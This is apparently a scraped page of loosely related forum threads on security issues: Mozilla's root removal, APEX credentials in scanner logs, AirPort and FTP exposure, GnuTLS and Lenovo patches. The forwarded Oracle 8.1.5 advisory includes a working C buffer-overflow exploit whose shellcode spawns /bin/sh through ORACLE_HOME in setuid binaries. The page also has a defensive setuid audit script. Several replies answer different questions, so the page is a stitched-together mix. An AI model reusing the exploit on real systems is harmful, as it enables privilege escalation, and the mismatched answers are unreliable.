Possible Security Vulnerability at Root regarding Mozilla & Keychain

Hi, everyone. I just came across the following announcement from the Mozilla Security Blog. In it, they mention Apple and the Keychain. Apparently, among the trusted certificate authorities in Mozilla products is one certificate whose whereabouts are in question.
Removing the RSA Security 1024 V3 Root
http://blog.mozilla.com/security/2010/04/06/removing-the-rsa-security-1024-v3-root/
I hope nobody perceives this notice as me yelling fire in a crowded theater, but I thought I would be remiss to not bring it to people's attention if there is a potential hole in our security. If anything, it can start a discourse and, if it is a legitimate threat, word will get to Apple faster. Also, moderators please move this thread if you feel it would best serve us elsewhere.

Yes, it is possible to alter/tamper/manipulate the wtmp file.
Please check man of fwtmp command.
The command is located at /usr/lib/acct/fwtmp

Similar Messages

  • Possible security vulnerability with apex

    Hello experts,
    I developed an application based on apex 4.2.6.00.03.
    The application uses custom authentication.
    My workplace uses Acunetix Web Vulnerability Scanner. When I scanned my app through Acunetix, the scan report shows my login password in clear text.
    (When we run the scan, we provide login sequence to Acunetix by actually logging in to the application)
    The scan report shows results like this: (I have removed my login credentials here and modified numbers for p_arg_names)
    /apex/wwv_flow.accept
    p_arg_names=357038148338609&p_arg_names=357039161318613&p_flow_id=&p_flow_step_id=10
    1&p_instance=325240555604&p_md5_checksum=&p_page_checksum=2EB94E21D0F04502B99AFFF7
    FAFD&p_page_submission_id=108909717781&p_request=LOGIN&p_t01="my user name"&p_t02="my password in clear text"
    How can I prevent my password to be showing up as clear text? Or even better, remove password completely?
    Password item is of type "Password". I didn't change default attributes of this item.
    Please help! And let me know if you need any further information to debug the issue.
    Thanks,
    RN

    I had a brief look at;
    http://www.acunetix.com/blog/docs/scan-form-based-protected-area-using-acunetix-login-sequence-recorder/
    Assuming that is how you have provided the username and password then this is how the web scanner has obtained the password. This is not 'interception' of the SSL channel. In effect you have typed the username/password into the web scanner application and it is using it to logon to the application (and showing you in its logs). We use a variation of the same technique in our ApexSec security product to log into the APEX builder. So long as the web scanner uses SSL to then forward the credentials then there is minimal additional risk than using a normal browser.
    If your certificates are correct and signed and the SSL server does not support 'weak ciphers' plus a normal browser indicates there is nothing wrong with the secure connection then you are as protected as you can be from interception of an established connection.
    Weak ciphers are detailed here - I presume you have some form of support from Acunetix;
    https://www.acunetix.com/blog/articles/tls-ssl-cipher-hardening/
    SSL by default does not give you "endpoint" security, i.e. any entity that can establish a network connection to the SSL service can create an SSL channel and interact with the service, as I've mentioned this can be implemented via SSL with client side certificates.
    If the assumptions I have made are correct and the details you have provided are correct then it sounds like this is not an issue you need to be concerned about.
    Hope this helps.
    regards,

  • We use an add-on in one of our online solutions and we've identified a security vulnerability. The issue has been addressed in our latest add-ons and we would like to know how we may blocklist our previous player through a firefox update?

    You can file a bug report to do that request.
    http://developer.mozilla.org/en/docs/Bug_writing_guidelines

  • Security vulnerability in Oracle 8.1.5

    The following email was forwarded to me about possible security vulnerabilities.
    I am looking for verification from both Oracle and the user community.
    ================================================================================
    [ Hackerslab bug_paper ] Linux ORACLE 8.1.5 vulnerability
    ================================================================================
    File : Oracle 8.1.5
    SYSTEM : LINUX
    Tested by RedHat Linux 6.2
    INFO :
    There are two security vulnerabilities in Oracle.
    1. buffer overflow
    It is possible to create a buffer overflow vulnerability using "ORACLE_HOME",
    one of the environmental value of Oracle.
    Oracle applications that are vulnerable to buffer overflow are as follow :
    - names
    - namesctl
    - onrsd
    - osslogin
    - tnslsnr
    - tnsping
    - trcasst
    - trcroute
    These applications allow an attacker to execute a buffer overflow exploit.
    2. Log-files created
    When a user executes one of Oracle applications such as names, oracle or tnslsnr,
    following log files are created.
    names
    ======
    -rw-rw-r-- 1 oracle dba 0 Oct 20 01:45 ckpcch.ora
    -rw-rw-r-- 1 oracle dba 428 Oct 20 01:45 ckpreg.ora
    -rw-rw-r-- 1 oracle dba 950 Oct 20 01:45 names.log
    oracle
    ======
    -rw-rw---- 1 oracle dba 616 Oct 20 05:14 ora_[running pid].trc
    tnslsnr
    =======
    -rw-rw-r-- 1 oracle dba 2182176 Oct 20 2000 listener.log
    SOLUTION
    Contact your vendor for a patch or close setuid permission.
    # su - oracle
    $ cd /oracle_8.1.5_install_directory/bin
    $ chmod a-s names namesctl onrsd osslogin tnslsnr tnsping trcasst trcroute
    ==-------------------------------------------------------------------------------==
    * ** ** * [email protected] [yong-jun, kim]
    * ** ** * [ http://www.hackerslab.org ]
    ******** HACKERSLAB (C) since 1999
    ==-------------------------------------------------------------------------------==
    Oracle 8.1.5 exploit
    -by loveyou
    offset value : -500 ~ +500
    #include <stdio.h>
    #include <stdlib.h>
    #define BUFFER 800
    #define NOP 0x90
    #define PATH "/hackerslab/loveyou/oracle/8.1.5/bin/names"
    char shellcode[] =
    /* - K2 - */
    /* main: */
    "\xeb\x1d" /* jmp callz */
    /* start: */
    "\x5e" /* popl %esi */
    "\x29\xc0" /* subl %eax, %eax */
    "\x88\x46\x07" /* movb %al, 0x07(%esi) */
    "\x89\x46\x0c" /* movl %eax, 0x0c(%esi) */
    "\x89\x76\x08" /* movl %esi, 0x08(%esi) */
    "\xb0\x0b" /* movb $0x0b, %al */
    "\x87\xf3" /* xchgl %esi, %ebx */
    "\x8d\x4b\x08" /* leal 0x08(%ebx), %ecx */
    "\x8d\x53\x0c" /* leal 0x0c(%ebx), %edx */
    "\xcd\x80" /* int $0x80 */
    "\x29\xc0" /* subl %eax, %eax */
    "\x40" /* incl %eax */
    "\xcd\x80" /* int $0x80 */
    /* callz: */
    "\xe8\xde\xff\xff\xff" /* call start */
    "/bin/sh";
    unsigned long getesp(void)
    __asm__("movl %esp,%eax");
    int main(int argc, char *argv[])
    char buff, ptr,binary[120];
    long *addr_ptr, addr;
    int bsize=BUFFER;
    int i,offset;
    offset = 0 ;
    if ( argc > 1 ) offset = atoi(argv[1]);
    buff = malloc(bsize);
    addr = getesp() - 5933 - offset;
    ptr = buff;
    addr_ptr = (long *) ptr;
    for (i = 0; i < bsize; i+=4)
    *(addr_ptr++) = addr;
    memset(buff,bsize/2,NOP);
    ptr = buff + ((bsize/2) - (strlen(shellcode)/2));
    for (i = 0; i < strlen(shellcode); i++)
    *(ptr++) = shellcode;
    buff[bsize - 1] = '\0';
    setenv("ORACLE_HOME",buff,1);
    printf("[ offset:%d buffer=%d ret:0x%x ]\n",
    offset,strlen(buff),addr);
    system(PATH);
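The workaround in the SOLUTION section of the forwarded advisory (`chmod a-s` on the eight listed binaries) can be turned into a repeatable audit. This is an added example, not part of the forwarded e-mail or of any Oracle tooling; the function names `audit_setid` and `strip_setid` are made up for illustration, and the binary list is copied from the advisory.

```shell
#!/bin/sh
# Binaries the advisory names as affected by the ORACLE_HOME overflow.
ORACLE_SETID_BINARIES="names namesctl onrsd osslogin tnslsnr tnsping trcasst trcroute"

# audit_setid DIR
# Print the path of every listed binary in DIR that still carries the
# setuid or setgid bit. Returns 0 when none do, 1 when at least one does.
audit_setid() {
    dir=$1
    found=0
    for name in $ORACLE_SETID_BINARIES; do
        path="$dir/$name"
        # Skip symlinks so a later chmod never follows one out of DIR.
        [ -L "$path" ] && continue
        [ -f "$path" ] || continue
        if [ -u "$path" ] || [ -g "$path" ]; then
            echo "$path"
            found=1
        fi
    done
    return "$found"
}

# strip_setid DIR
# Apply the advisory's "chmod a-s" only to the binaries audit_setid flags,
# and print what was changed. Other files in DIR are left untouched.
strip_setid() {
    audit_setid "$1" | while IFS= read -r flagged; do
        chmod a-s "$flagged" && echo "cleared: $flagged"
    done
}

# Stand-alone use: sh audit.sh /path/to/oracle/bin
if [ "$#" -ge 1 ]; then
    if audit_setid "$1"; then
        echo "no listed binary in $1 is setuid/setgid"
    else
        echo "setuid/setgid still set on the files listed above" >&2
    fi
fi
```

Run the audit again after any Oracle patch or reinstall, since installers can restore the original permission bits.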

    Hi Peter,
    I was told that Oracle8 and Oracle8i Parallel Server on IBM
    RS/6000 AIX comes with its own Lock Manager and this LM does not
    rely on the Cluster Lock Manager (cllockd) of HACMP for AIX, as
    Oracle7 Parallel Server on normal (non-SP) RS/6000 does.
    (Oracle7 Parallel Server on RS/6000 SP didn't use the cllockd of
    HACMP but came with a special LM.)
    Cluster-wide Filesystems are not used for OPS on Unix, as far as
    I know Unix (AIX, Solaris). All Data-, Log- and Control-Files
    must reside on concurrently (!) accessible Raw-Devices (e.g. Raw
    Logical Volumes on AIX).
    So I guess it should be possible for Oracle to port OPS to Linux.
    No special Cluster-Services would be needed for OPS on Linux,
    just a shared SCSI-bus (e.g.) and a fast interconnect (e.g.
    100BaseT).
    Peter Sechser (guest) wrote:
    : Dave,
    : Parallel Server needs some cluster services in order to
    : communicate between several nodes. So, the operating system has
    : to offer things like inter-node communication services,
    : cluster-wide lock communication services and a clusterwide
    : filesystem. I'm not quite sure, to what degree Linux offers/will
    : offer these services.
    : Peter

  • JComboBox makes for nice security vulnerability under X11?

    I noticed a couple years ago that when I set a breakpoint inside a JComboBox state change event handler on a Java application or applet running under X11, the entire desktop would hang. Back then, I checked the Swing bug database and found an issue regarding this, but it was closed with an evaluation that pretty much simply said that the developer didn't know how to fix it.
    When I brought this up in the netbeans mailing list, someone suggested that this could be a security issue if someone intentionally/programmatically stopped all processing from within this event handler (perhaps from an applet). Perhaps, as a security vulnerability this bug would get more attention!
    Well, it's been over a year and the latest JDK 1.6b10 (build 25) still has this problem. So, obviously it's not bothering anyone, except me, enough to do anything about it. I could try to file this bug under Swing again (probably with same outcome) or try filing it as a security bug. What are people's thoughts?

    Hi
    Try going here:
    http://europe.nokia.com/A4423034
    Or alternatively : find the product pages for the 5700 by going to www.nokia.com/phones, then pick out 5700, then dip into "PC software" and "Music"
    Cheers

  • Tightening security on the Root DSE

    Good afternoon,
    I would like to tighten the security on my Root DSE to allow a simple 'DirContext.lookup("")' to not throw a security exception for any normal users.
    However, the only ACI setting that seems to allow any user 'read' / 'browse' access to the Root DSE itself is this:
    access to attr=(*) by * (read,search,compare)
    There seems to be a hidden attribute that is accounted for by specifying (*). I tried the obvious, supportedextensions, supportedldapversion, and others.
    Compatibility with Portal is ideal, but that's an afterthought at this time.
    Thanks!!
    -Sean

    Hello Jano,
    ok let me explain the scenario for a better visibility of the problem.
    The files are lying on the webserver under its root directory.
    1.The root directory of the server is docs.
    2.The files(file1.txt,file2.txt) are lying in a directory by the name of cliksdmrroot which in turn is lying on the root directory docs.
    so the file structure becomes /docs/cliksdmrroot.
    Now this(file1.txt,file2.txt) can be accessed by typing http://web_server_ip/docs/cliksdmrroot/file1.txt
    Requirement:-
    To protect the unauthorised access to this file1.txt lying in the cliksdmrroot.
    Approach taken:-
    I have made a servlet by the name of cliksdmrroot and have mapped it to the url prefix cliksdmrroot. this servlet is lying in the cliksdmrroot folder.
    Now whenever a request is made for the file1.txt which is by entering the url
    http://web_server_ip/docs/cliksdmrroot/file1.txt
    then this request will be intercepted first by the servlet.
    This servlet is responsible for any sort of validation that has to be done prior to content serving.
    But now if i want to redirect the request to the resource after the validation is cleared i am using
    httpservletrequest.getRequestDispatcher(trimmedrequestURI).forward(httpservletrequest, httpservletresponse);
    to forward the request. where trimmedrequestURI is the extracted filename from the getRequestURI method.
    if i use this approach the webserver forwards the request to
    http://web_server_ip/docs/cliksdmrroot/file1.txt
    which again has cliksdmrroot in its address which inturn invokes the servlet and it leads to a too many nested despatches exception. How can i overcome this. and also if you have some other solution in mind i would be obliged if you could help me in this.
    Regards,
    Saurabh

  • CVE-2000-0649 Security Vulnerability

    I have 2 NW 6.5 SP8 servers which are running HTTPSTK (version 4.03 9/4/08) PORTAL (version 4.03 9/22/08). I am trying to pass a security scan and a security vulnerability on ports 8008 and ports 8009 has been identified, issue CVE-2000-0649, whereby my internal IP addresses may be exposed.
    Is there a later version of HTTPSTK and PORTAL which address this security vulnerability, or do I need to close ports 8008 and 8009 via my firewall?

    Did you read the CVE... the one from eleven years ago? First clue that
    this is, as usual, bogus:
    <quote>
    IIS 4.0 allows remote attackers to obtain the internal IP address of the
    server via an HTTP 1.0 request for a web page which is protected by basic
    authentication and has no realm defined.
    </quote>
    If you're really concerned have your security assessors prove the issue is
    real by exploiting the vulnerability.
    Good luck.
    On 06/27/2011 10:36 AM, flakestar wrote:
    >
    > I have 2 NW 6.5 SP8 servers which are running HTTPSTK (version 4.03
    > 9/4/08) PORTAL (version 4.03 9/22/08). I am trying to pass a security
    > scan and a security vulnerability on ports 8008 and ports 8009 has been
    > identified, issue CVE-2000-0649, whereby my internal IP addresses may be
    > exposed.
    >
    > Is there a later version of HTTPSTK and PORTAL which address this
    > security vulnerability, or do I need to close ports 8008 and 8009 via my
    > firewall?
    >
    >

  • HT202802 What "security vulnerability" will be opened by using this signing technique?

    Regarding article: HT202802
    OS X: Using AppleScript with Accessibility and Security features in Mavericks - Apple Support
    The article says:
    Important: Signing an applet using the following method introduces a security vulnerability that could allow malicious software to use Accessibility without user permission.
    1. What "security vulnerability" will be opened by using this signing technique?
    2. Does signing this way only make the App its applied to vulnerable only? and then the whole computer vulnerable depending on how extensive the app's reach is to the rest of the computer?
    3. More information: My app only relates to the Reminders app and bunch of Finder items....nothing internet based, etc.  That being said, is this still a vulnerability to my computer?
    "Note: If you have your own signing identity, you may use that identity in place of “-” for the -s option." 
    1. What is "my own signing identity?" and if I don't have one, would it add security to get one and use it here?
    Thanks for the help in advance!

    1) There are a few system features, including accessibility, that will override any and all other security protections on you machine. This is the vulnerability. In giving the script the ability to control your machine, you give control of your machine to the script.
    2) By signing the script, that control is permanent. If the app doesn't do anything malicious, there is no problem. But malicious apps sometimes don't manifest until later.
    3) Did you write the app? If so, then there is nothing to worry about. If not, then how much do you trust the author of the app?
    Generally, this isn't too big a deal. Apple is very protective, but most people generally hand over their passwords to anyone. They shouldn't, of course, but generally they do. They don't realize the extent to which they have handed over control of their machine and all of their data. Apple is trying to point that out.

  • FTP security vulnerability or what ?

    I have tested the FTP settings on my DL2100 and allowed access for only 2 users X and Y. I have disabled Anonymous user on the FTP folder. When I looked at my logs, I saw that Anonymous has been logging in and out a few times a day. I said that's impossible since this user is not allowed. I logged on to the FTP with Anonymous myself, to my surprise, and see only the ROOT folder, but indeed no FTP shares. I couldn't navigate anywhere with this user, BUT is this the way WD intended to secure FTP connections? Shouldn't the connection for Anonymous be denied from the beginning?

    adicrst wrote:
    Reply from WD Support
    Thank you for contacting Western Digital Customer Service and Support. My name is X.
    I am sorry to read that you have an issue with the FTP. Our apologies for the inconvenience that this may have caused you.
    Concerning the question you have about the Anonymous in FTP, I can inform you that when you created shares which are accessible through FTP and you selected for the Anonymous as None, it is counted always for the share which Anonymous is not allowed to access and not for the root directory. That is why you can see the root directory, but not the specific shares.
    I hope that I provided you the information you need and that you are satisfied with the answer.
    If you have any further questions, please reply to this email and we will be happy to assist you further.
    So in other words we should just live with this security vulnerability, even if everyone has a solid confirmation that your FTP is available on the internet and everyone can log in just for the fun of it with the Anonymous user. What if I allow only 1 FTP connection and a hacker is holding it busy with an Anonymous session?
    Like the support guy stated, when you enable FTP on a folder, remember to select, and when I state select, I mean click the down arrow and select "Anonymous None", then click save. That is how I know it will save the setting. If you don't select, the device will think you want to set your FTP server for everyone to log in, "including anonymous."

  • Iphone 3G Software Update Fixes security vulnerability associated with viewing malicious PDF files?

    Is there an Iphone 3G Software Update Fixes security vulnerability associated with viewing malicious PDF files?  Latest version I can download is 4.2.1
    I assume no fix is available, does anyone know if I'm still vulnerable to the security bug?

    No fix is needed since that vulnerability isn't in 4.2.1.

  • Possible Security Risks

    I got my AirportExtreme base station connected to ISP via fibre-optic modem via PPPoE assessed by Comodo.com, and it gave these possible security threats. It was even possible to tell how long had the airport connected to Internet via PPPoE, which was bit of scary.
    I do not know how to make it stop responding to ICMP pings coming from outside, which is also a considerable potential security threat.
    I do not know how to fix them. Does anyone know? (I paste some excerpts from the security report for reference.)
    *1. Security warning found on port/service "osu-nms (192/udp)"
    The remote host is an Airport, Airport Extreme or Airport Express wireless access point. It is possible to gather information about the remote base station (such as its connection type or connection time) by sending packets to UDP port 192. An attacker connected to this network may also use this protocol to force the base station to disconnect from the network if it is using PPPoE, thus causing a denial of service for the other users.
    Solution : Filter incoming traffic to this port, make sure only authorized hosts can connect to the wireless network this base station listens on.
    Risk factor : Medium / CVSS Base Score : 4 (AV:R/AC:H/Au:NR/C:N/A:C/I:N/B:A) Plugin output: - The station has been connected to the network for 10 days 12h47m28s - The station is connected to the network via PPTP.
    *2 Security warning found on port/service "general/icmp"
    Synopsis : It is possible to determine the exact time set on the remote host. Description : The remote
    host answers to an ICMP timestamp request. This allows an attacker to know the date which is set on
    your machine. This may help him to defeat all your time based authentication protocols.
    Solution : filter out the ICMP timestamp requests (13), and the outgoing ICMP timestamp replies (14).
    Risk factor : None / CVSS Base Score : 0 (AV:R/AC:L/Au:NR/C:N/A:N/I:N/B:N)
    CVE : CVE-1999-0524
    iBook G4   Mac OS X (10.4.6)   Using AirportExtreme Base Station (Firmware ver. 5.7)

    > I got my AirportExtreme base station connected to ISP
    > via fibre-optic modem via PPPoE assessed by
    > Comodo.com, and it gave these possible security
    > threats. It was even possible to tell how long had
    > the airport connected to Internet via PPPoE, which
    > was bit of scary.
    > I do not know how to make it stop responding to ICMP
    > pings coming from outside, which is also a
    > considerable potential security threat.
    Actually you can't. You can't manage the firewall
    filtering within an ABS, an AEBS or an AX. They
    look like they share the exact same code for this
    part of their software.
    > I do not know how to fix them. Does anyone know? (I
    > paste some excerpts from the security report for
    > reference.)
    You have 2 architectural ways to improve the protection
    of your network (on the Internet side):
    - introduce a firewall between your modem and your AEBS;
    - use a Mac as a firewall router:
      * connect this Mac via Ethernet to your modem;
      * configure its firewall (and enable logging);
      * configure the sharing of this Ethernet connection
        to AirPort.
    > *1. Security warning found on port/service "osu-nms
    > (192/udp)"
    > *2 Security warning found on port/service
    > "general/icmp"
    These aren't really serious risks. But you should report
    them to Apple. Why for?
    Because there are really serious risks around the use
    of the AirPort base stations (all of them) and some of
    them are already reported to Apple.
    Apple should be aware that many of their customers are
    tired of networks, Internet, softwares and OSes they
    can't trust.
    dan    

  • Mac Java security vulnerability upgrade - issue.

    The recent (I did it today) upgrade of Mac OS 10.8.2 to fix Java security vulnerability is now causing flickering on my Macbook Pro. Kindly help.

    Restart.
    Reset PRAM.  http://support.apple.com/kb/PH4405
    Best.

  • Upgrade to GnuTLS 3.2.12 to Avoid Security Vulnerability

    Per ArsTechnica, RedHat discovered a security vulnerability in GnuTLS and published an alert on March 3. Thanks to andyrtr, the safe version (3.2.12-1) was pushed into extra on March 3 (i.e., same day).
    You might consider updating GnuTLS.
    Further details
    http://arstechnica.com/security/2014/03 … sdropping/
    Last edited by snakeroot (2014-03-04 23:53:21)

    nourathar wrote:
    nomorewindows wrote:pacman -Qi gnutls would give this for installed applications that use it.
    Hi nomorewindows,
    $ pacman -Qi gnutls
    Name : gnutls
    Version : 3.2.12-1
    Description : A library which provides a secure layer over a reliable transport layer
    Architecture : x86_64
    URL : http://www.gnutls.org/
    Licenses : GPL3 LGPL2.1
    Groups : None
    Provides : None
    Depends On : gcc-libs libtasn1 readline zlib nettle p11-kit
    Optional Deps : None
    Required By : ffmpeg filezilla glib-networking gnome-vfs gst-plugins-bad libimobiledevice smbclient
    Optional For : None
    Conflicts With : None
    Replaces : None
    Installed Size : 4703.00 KiB
    Packager : Andreas Radke <[email protected]>
    Build Date : Mon 03 Mar 2014 04:09:47 PM CET
    Install Date : Tue 04 Mar 2014 11:24:30 PM CET
    Install Reason : Installed as a dependency for another package
    Install Script : Yes
    Validated By : Signature
    the output is very different though and in my case  it lists only 7 packages.
    It makes me really wonder what 'whoneeds' actually does ?
    I suppose 'whoneeds' lists all the packages I have installed that require one of these 7 and so recursively on ?
    ciao,
    J.
    Notice it said 49 of his 495 packages.  And also notice that the same ones listed in your output are also in his output above.

  • WRT1900AC - Open Port - 52147 - Security Vulnerability?

    I recently noticed in the router logs incoming connections on port 52147. I have confirmed that this port on the router is open (not closed or stealthed), by using the port scan tool at www.grc.com.  See port scan screenshot below.
    This situation is present with no devices connected to my internal network. My router is on the current firmware (1.1.8.164461).
    Anyone have an idea what is going on?
    Jeff
    Incoming log
    Source IP address | Destination port number
    110.93.76.194          52147 
    73.52.28.251            52147

    Yes, I did setup a Smart Wifi account during initial setup.
    Is there any documentation where I can confirm that the port is open for Smart Wifi services, and should I be concerned about the inbound connections listed in the log (See above)?
    I am seeing a few more random IP addresses associated with that port in the log each day or so, and I would think that if it was due to legitimate Smart Wifi services activity, the traffic would be from a specific (and documented) address for Linksys servers.
    UPDATE: I just checked the log again, and there are a dozen or so random IP addresses in the Incoming Log associated with port 52147. Who-Is lookups place these addresses all around the world. Until this is explained to my satisfaction, I am leaving my devices disconnected from this router, and treating this as a security vulnerability.
    If anyone has any information or insight into this, it would be greatly appreciated.

  • Lenovo software and driver security vulnerability fixes

    I have noticed there are security vulnerability fixes (among other fixes) in several Lenovo software and driver updates.
    Synaptics ThinkPad UltraNav Driver (2013/04/25, version 16.2.19.7)
    http://download.lenovo.com/ibmdl/pub/pc/pccbbs/mobiles/6hgx75ww.txt
    <16.2.19.7>
    - (Fix) Fixed security vulnerability issues.
    Hotkey Features Integration (2013/04/25, version 3.84.5000)
    http://download.lenovo.com/ibmdl/pub/pc/pccbbs/mobiles/8jvu35ww.txt
    <3.84.5000>
     - (Fix) Fixed security vulnerability issues in service registration path and function calls inside the program binary.
    Power Manager (2013/04/26, version 6.54)
    http://download.lenovo.com/ibmdl/pub/pc/pccbbs/mobiles/hfu406ww.txt
    <6.46>
    - (Fix) Fixed a vulnerability security issue.
    ThinkVantage Access Connections (2013/04/08, version 6.01)
    http://download.lenovo.com/pccbbs/mobiles/ggc709ww.txt
    <5.97>
     - (Fix) Fix for security vulnerabilities privately and responsibly disclosed by Frederic BOURLA of High-Tech Bridge SA

    There are several reports of fixed vulnerabilities in Lenovo software and drivers that I have summarized here
    Unfortunately there are no detailed descriptions of these security issues. Currently there are databases like CVE MITRE that collects such reports for any software. Could Lenovo be more specific about these vulnerabilities and add CVE references ?
    Moderator Note; Threads merged; link to this thread removed
